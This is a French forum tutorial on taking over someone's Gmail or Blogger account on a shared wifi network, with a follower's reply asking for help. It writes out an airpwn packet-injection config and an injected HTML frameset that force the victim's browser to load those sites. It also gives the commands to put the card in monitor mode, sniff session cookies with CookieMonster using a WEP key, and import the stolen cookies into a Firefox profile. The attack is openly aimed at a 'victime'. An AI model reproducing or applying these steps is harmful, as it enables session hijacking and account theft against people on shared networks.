tuto speed récupération de compte gmail, blogger ou autre en wifi via cookiemonster

[bricowifi]

Beaucoup de personnes connaissent l'outil wifizoo, ou encore hamster and ferret, par contre cookie monster c'est moins connue et c'est redoutablement efficace.

Ici on va sniffer avec cookie monster, il peut récupérer des cookies en principe protégé par SSL sur des domaines vulnérables, son fonctionnement est intéressant car il stock soi en .txt ou alors dans une database pour l'import dans firefox, c'est a dire qu'avec cookie monster vous sniffez, et ensuite vous créez un profil pour firefox, et i vous importe les cookies sniffez.

Cookie monster fonctionne de façon passive, mais dans ce tuto on va dire qu'on est pressé, d'ou le "speed récupération de compte" l'attaque qui est présenté n'a rien de discret, son but est l'éfficacité.
Pour rediriger directement sur blogger et gmail on va utiliser airpwn qui va intercepté le contenu et tenter de le remplacer en injectant.

|* 1 Préparation de airpwn:

Dans le dossier de conf on va créer un nouveau document texte qu'on nomme par exemple google, voici un exemple de mon contenue:

Code:

begin google
match ^(GET|POST).*
ignore (^GET [^ ?]+\.(?i:jpg|jpeg|gif|png|ico|css)|(?i:host: .*google.com))
response content/google

Dans le dossier content, on va créer un nouveau document, il sera du type html, je le nomme googe, voici mon contenue:

Code:

HTTP/1.1 200 OK

Connection: close

Content-Type: text/html

Content-Length: 250

<html>
<frameset cols="0, *">
<frame src="http://www.blogger.com/" />
<frame src="http://mail.google.com/mail?hl=en" />
</frameset>

|* 2 On configure eventuelement cookiemonster, pour le SSL vous avez a rentrer les domaines qui si on bloque le SSL passe en http

le fichier est "config_settings.py" voici le début de son contenue

Code:

#!/usr/bin/python



# Python sugar. Ignore this.

__all__ = ["ALWAYS_TARGET", "COMMON_PATHS", "MAX_ATTEMPTS", "SEND_RST", "MAX_TRACK_LEN", "IGNORE_HOSTS", "LOG_REFERERS_WITH", "FULL_BOUNCE_FOR"]





# This is a list of target sites to always inject into target IP streams.

# They will be injected until either cookies are obtained for them, or

# MAX_ATTEMPTS is reached, whichever comes first.

#

# NOTE: to remove these, you must actually remove the line. Changing True

# to False does nothing.

#

# Example:

#ALWAYS_TARGET = {"mail.google.com" : True,

#                   "www.skype.com" : True,

#                   "yahoo.com" : True,

#                   "live.com" : True,

#                   "www.facebook.com" : True,

#                   "www.livejournal.com" : True}

ALWAYS_TARGET = {}

Les lignes avec des # sont des commentaires le programme n'éxécutera rien de cela, la première ligne est celle que vous pouvez modifier comme indiqué dans les commentaires.

|* 3 à l'attaque

*On place notre carte en mode monitor:

Code:

airmon-ng

Code:

airmon-ng start wlan0

wlan0 à remplacer par votre carte

*On lance cookie monster

Code:

usage: cookiemonster.py -i <device> -d <driver> [-c <channel>] [-b <BSSID/Target MAC>] [-k <wep_key>] [--ff3] [-u] [-r] [--aggressive]

Supported cards are: nodriver wlan-ng hostap airjack prism54 madwifing madwifiold rtl8180 rt2570 rt2500 rt73 rt61 zd1211rw bcm43xx mac80211

Ce qui donne pour moi:

Code:

python2.5 cookiemonster.py -i wlan0 -d rtl8180 -c 11 -b 00:07:11:22:33 -k 1212121212 --ff3

-i interface wifi, ici wlan0 que j'ai au préalable passé en monitor
-d le driver
-c le cannal ou se situe votre victime
-b l'adresse mac du point d'accès
-k la clé wep si besoin (attention a la foutre sans les : : )
--ff3 active la récupération des cookies dans une database pour la compatibilité firefox 3

*Maintenant, on en a marre de récupérer les cookies passivement, on va rediriger a victime avec airpwn:

Code:

usage: airpwn -c <conf file> -d <driver name> [interface options] [options]
    <conf file> : configuration file
    <driver name> : supported wireless driver name

Interface options:
    You can use -i to set all 3 interfaces at once, or use the
    other options to set each interface individually.
    -i <iface> : sets the listen/control/inject interface
    -M <iface> : sets the listen (monitor) interface
    -C <iface> : sets the control interface
    -I <iface> : sets the injection interface

Optional arguments:
    -l <logfile> : log verbose data to a file
    -f <filter> : bpf filter for libpcap
    -F : assume no FCS values from the monitored interface
    -m <max> : Specify the maximum data chunk size (MTU - headers)
    -k <WEP key>: key to use to de/encrypt WEP packets.  You can
        use this option multiple times to specify multiple WEP keys.
    -v : increase verbosity (can be used multiple times)
    -h : get help (this stuff)

Supported drivers are: wlan-ng hostap airjack prism54 madwifing madwifiold rtl8180 rt2570 rt2500 rt73 rt61 zd1211rw bcm43xx mac80211

Voici ce que sa donne pour moi:

Code:

airpwn -c conf/google -d rtl8180 -i wlan1 -F -k 12:12:12:12:12 -vv

-c le fichier de configuration préalablement préparé
-d le driver
-i wlan1
-F (chez moi ca ne passe pas sans cela sur du wep)
-k la clé wep
-vv pour afficher pas mal d'informations dans le shell (injection)


Une fois lancé airpwn, il va écouter, on le place directement sur le bon canal, pour moi "11" et "Enter"

Quand vous avez terminé la manipulation il ne reste plus qu'a copier les cookie sur un nouveau profil que vous aurez créé par éxemple

Code:

Usage:
copycookies.py [-P <FirefoxProfile>] [-I <ImpersonateIP>] [--ff3]

Ce qui donne:

Code:

python2.5 copycookies.py --ff3

Et voila, une démonstration video sera bientot disponible sur le blog

[Guest]

a tu fait la video ?
sinon esque sa marche si la victime surf sur ethernet ?
dans le tuto je bloque comment veut tu etre rediger sur blogger et google mail ? en meme temps ?
de plus quand j'enregistre dans un bloc note nomé googe au lencement sur firefox il me dise

HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 250

esque c'est norml ?